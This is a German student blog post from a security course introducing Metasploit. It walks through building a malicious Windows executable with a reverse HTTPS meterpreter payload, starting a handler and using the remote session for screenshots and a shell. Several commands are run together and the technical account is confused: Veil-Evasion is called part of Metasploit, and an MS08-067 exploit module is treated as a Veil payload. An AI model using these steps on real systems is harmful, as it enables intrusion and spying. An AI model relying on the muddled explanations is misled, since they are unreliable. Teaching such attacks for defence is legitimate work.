Back-to-School: Aus dem Klassenzimmer des CAS Information Security & Risk Management. Basis für diesen Lehrgang ist das BSI-Grundschutzhandbuch, und die Teilnehmenden bereiten sich begleitend auf die CISSP-Prüfung vor. Ein weiterer Teil des 15-tägigen Lehrgangs ist es, ein CISSP- oder BSI-Fachthema als Blogpost aufzubereiten:

MetaSploit-Framework: Einführung in das „Hacking-Tool“

Das Erstellen von Viren und Malware ist mit dem „Hacking-Tool“ MetaSploit-Framework kinderleicht und erfordert keine grossen IT-Kenntnisse. Das MetaSploit-Framework entstand aus dem Open-Source-Projekt „Metasploit-Projekt“ der Entwicklergruppe „Rapid7“. Das Ziel des Projekts war es, ein Framework zu entwickeln, das unter anderem bekannte Informationen über Sicherheitslücken bietet, und anhand dieser Informationen Penetrationstests durchzuführen. Dass so ein Framework auch von sogenannten „Scriptkiddies“ missbraucht werden kann, liegt auf der Hand. Eine Malware ist damit im Handumdrehen erstellt und kann dann beispielsweise in einer Mail als getarntes Word-Dokument verschickt werden. Kein Wunder also, dass sich aufgrund dieses Open-Source-Framework solche Malware-Angriffe häufen.

Zugang auf ein System in drei Schritten:

Das Erstellen und Anwenden einer Malware mithilfe des MetaSploit-Framework gliedert sich in folgende Schritte:

1. Die Verwundbarkeit (der Exploit) kann ausgewählt werden.Dies können typische Verwundbarkeiten in Microsoft Windows, Adobe Flashplayer, Oracle Java etc. sein. Im nachstehenden Beispiel wurde die Verwundbarkeit ausgewählt, die mit dem Microsoft Patch MS08-067 korrigiert würde.

2. Als Nächstes sucht man sich den gewünschten Payload aus. Der Payload ist der Schadcode, der auf dem Zielsystem ausgeführt wird. In untenstehendem Beispiel wurde der Payload ausgewählt, der beim Ausführen der Malware eine „HTTPS Reverse-Session“ öffnet und somit von „innen“ (vom Zielsystem) nach „aussen“ eine verschlüsselte HTTPS- Verbindung aufbaut, die den „Vorteil“ hat, von Firewalls und IPS-Systemen kaum erkannt zu werden, da die Verbindungen nach aussen meist weniger stark kontrolliert werden.
3. Die Malware wird ausgeführt. Wird die Malware effektiv vom Zielsystem ausgeführt (und ist der Microsoft Patch MS08-067 auf dem Zielsystem nicht installiert), öffnet sich zwischen Ziel- und Sourcesystem eine Session, die dann beispielsweise vom Angreifer dazu verwendet werden kann, Aktionen auf dem System zu tätigen. Da das lokale Ausführen von Executables, resp. solcher Malware meist nur mithilfe eines lokalen Administrator abgewickelt werden kann, hat der Angreifer im besten Falle lokale Administratorrechte.Verschafft sich der Angreifer dann mittels lateral movement Zugang zu weiteren Netzwerksystemen, beispielsweise zum Domain Controller, kann er schlussendlich die Kontrolle über ein ganzes Unternehmen erlangen, vorausgesetzt es gelingt ihm, auf einem ungepatchten System eine Malware auszuführen.

 

Praktisches Beispiel auf einer Kali-Linux Distribution:

Werden die untenstehenden Befehle auf einer Kali-Linux Distribution ausgeführt, wird die vorhin erwähnte Malware generiert. Das nachstehende Beispiel sollte stets nur in einer geschützten Umgebung (z.B. nur zwischen zwei lokalen virtuellen Maschinen) nachgestellt werden, damit auch der Internet-Provider nicht bei  diesen Tests mitliest. Mit der veil-evasion Funktion aus dem MetaSploit-Framework wird die Malware mit folgenden Commands generiert:

veil-evasion show payloads use windows/smb/ms08_067_netapi set lhost 192.168.206.128 set lport 443 generate

  Im Anschluss müssen der Payloadname und die Anzahl Payloads angegeben werden:

TEST_CAS_IT_Security_2018 enter number: 1

  Die Malware wird bei Standardsettings in folgendem Verzeichnis abgelegt:

/var/lib/veil-evasion/output/compiled/TEST_CAS_IT_Security_2018.exe

  Nun kann auf das Ausführen der Malware „gehört“ werden:

use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_https set LHOST 192.168.206.128 set LPORT 443 set ExitOnSession false exploit -j

  Wird die Malware ausgeführt, wird eine neue Session geöffnet, auf die dann verbunden werden kann:

sessions -i 1

  Nun wird eine Remote Shell geöffnet und man kann sich beliebige Informationen aus dem System lesen, einen Screenshot vom Zielsystem erstellen lassen, eine Windows Shell öffnen etc.:

sysinfo use espia screengrab sysinfo shell ….

 

CAS Information Security & Risk Management: Hashtags / Domains

#CISSP  #BSI  #Securityframework  #securityawareness  #cybersecurity  #intrusionprevention #risikoanalyse  #desasterrecovery  #businesscontinuity  #BSI200  #iso27000  #securitymodels  #identitycontrol  #accesscontrol  #sqlinjection  #mobilecommunication #voip  #angriffsmethoden  #darkweb

---

Blogpost wurde erstellt von Simon Meier im Rahmen vom CAS Information Security & Risk Management. Dozenten in diesem sehr praxisorientierten Lehrgang sind: Lukas Fässler (FSDZ Rechtsanwälte & Notariat AG) Rainer Kessler (Governance Concept GmbH), Andreas Wisler (goSecurity GmbH) Beim nächsten CAS live dabei sein? Hier der Link zur Ausschreibung CAS Information Security & Risk Management Der CAS findet in der Regel zweimal im Jahr statt. Starttermine: März & September Persönliche Beratung für den Lehrgang gewünscht? Einfach Prof. Martina Dalla Vecchia ein E-Mail schreiben und einen Termin vorschlagen.